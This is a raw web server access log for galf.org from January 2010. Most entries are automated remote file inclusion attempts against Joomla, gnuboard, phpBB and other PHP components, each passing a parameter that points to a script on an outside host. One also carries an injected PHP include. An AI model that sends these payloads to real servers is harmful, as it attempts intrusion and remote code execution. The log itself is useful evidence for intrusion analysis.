69.16.230.82 - - [25/Jan/2010:06:26:58 -0800] "GET /logs/access_090803.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:27:15 -0800] "GET /logs/access_090803.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:28:19 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:28:19 -0800] "GET /logs/access_091102.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:28:19 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:28:34 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:06:29:39 -0800] "GET /logs/access_090803.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:31:02 -0800] "GET /logs/access_100104.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.74 - - [25/Jan/2010:06:31:03 -0800] "GET /logs/access_090622.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:06:32:17 -0800] "GET /logs/write_update.php?board_skin_path=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:06:32:17 -0800] "GET /write_update.php?board_skin_path=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [25/Jan/2010:06:32:18 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://gay-nn.ru/images/flags/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:06:34:42 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.174.48.203 - - [25/Jan/2010:06:38:13 -0800] "GET /logs/access.log%20//joomla/components/com_extcalendar/admin_events.php=http://www.londonjudo.org.uk/asc???&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.174.48.203 - - [25/Jan/2010:06:38:13 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.londonjudo.org.uk/asc???&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.174.48.203 - - [25/Jan/2010:06:38:13 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.londonjudo.org.uk/asc???&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.202.168.74 - - [25/Jan/2010:06:38:49 -0800] "GET /logs/access_090629.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:42:31 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:06:42:31 -0800] "GET /logs/access.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:06:42:32 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:06:42:53 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:06:42:53 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:06:42:53 -0800] "GET /logs/access.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
139.146.140.227 - - [25/Jan/2010:06:43:44 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:44:49 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:44:49 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:46:35 -0800] "GET /citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:46:35 -0800] "GET /logs/access.log%20%20//citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:46:35 -0800] "GET /logs//citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:06:48:34 -0800] "GET /logs/access.log%20%20//setup.php/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:06:48:34 -0800] "GET /setup.php/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:06:48:34 -0800] "GET /logs//setup.php/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:50:08 -0800] "GET /logs/access.log////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:50:08 -0800] "GET /logs////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:50:08 -0800] "GET ///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:06:50:23 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:06:50:23 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:06:50:23 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:50:25 -0800] "GET ///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:50:25 -0800] "GET /logs////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:50:25 -0800] "GET /logs/access.log%20%20////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:51:05 -0800] "GET ///delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:51:05 -0800] "GET /logs////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:51:05 -0800] "GET /logs/access.log////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:27 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:36 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:36 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:36 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:39 -0800] "GET /logs/access_090615.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:40 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:51:44 -0800] "GET /logs/access_090720.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:52:02 -0800] "GET /citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:52:03 -0800] "GET /logs//citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:52:03 -0800] "GET /logs/access.log%20%20//citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:07 -0800] "GET /logs/access_090720.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:07 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:07 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:52:18 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:52:18 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:52:18 -0800] "GET /logs/access_090720.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:35 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:35 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:35 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:52:46 -0800] "GET /logs/access.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:06:52:53 -0800] "GET /logs/access_090720.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:52:58 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:52:59 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:52:59 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:53:12 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:53:12 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:53:12 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:53:23 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:53:30 -0800] "GET /logs/access_100118.log%20%20////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:53:42 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:53:42 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:53:44 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:53:49 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:53:49 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:53:49 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.82.53.99 - - [25/Jan/2010:06:53:56 -0800] "GET /logs/access_100118.log////delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:00 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:00 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:01 -0800] "GET /logs/access_090720.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:05 -0800] "GET /logs/access_090615.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:06:54:08 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.frentesdeseguridad.gov.co/administrator/backups/image/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:14 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:14 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:14 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:54:23 -0800] "GET /logs/access_090907.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:06:54:35 -0800] "GET /logs/access_090921.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:54:38 -0800] "GET /logs/access.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:06:55:28 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:55:28 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:55:28 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:55:37 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:55:39 -0800] "GET /logs/access_090907.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:06:55:53 -0800] "GET /write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:06:55:55 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:06:55:55 -0800] "GET /logs//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:56:20 -0800] "GET /logs/access_090720.log/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:56:20 -0800] "GET /?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:56:20 -0800] "GET /logs/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:56:32 -0800] "GET /logs/access.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:56:32 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:06:56:32 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:56:38 -0800] "GET /logs/access_090720.log/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:56:38 -0800] "GET /?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:06:56:49 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:06:56:49 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:06:56:49 -0800] "GET /bbs//write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:56:54 -0800] "GET /logs/access_090921.log/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:06:57:40 -0800] "GET /logs/access_090921.log/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:06:58:20 -0800] "GET /errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:06:58:20 -0800] "GET /logs/errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:06:58:20 -0800] "GET /logs/errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:06:58:20 -0800] "GET /errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:06:59:09 -0800] "GET /logs/access_100118.log%20%20//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:06:59:14 -0800] "GET /logs/access.log//citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:59:24 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:59:24 -0800] "GET /logs/access_090720.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:06:59:24 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:06:59:55 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:06:59:55 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:06:59:55 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:15 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:15 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
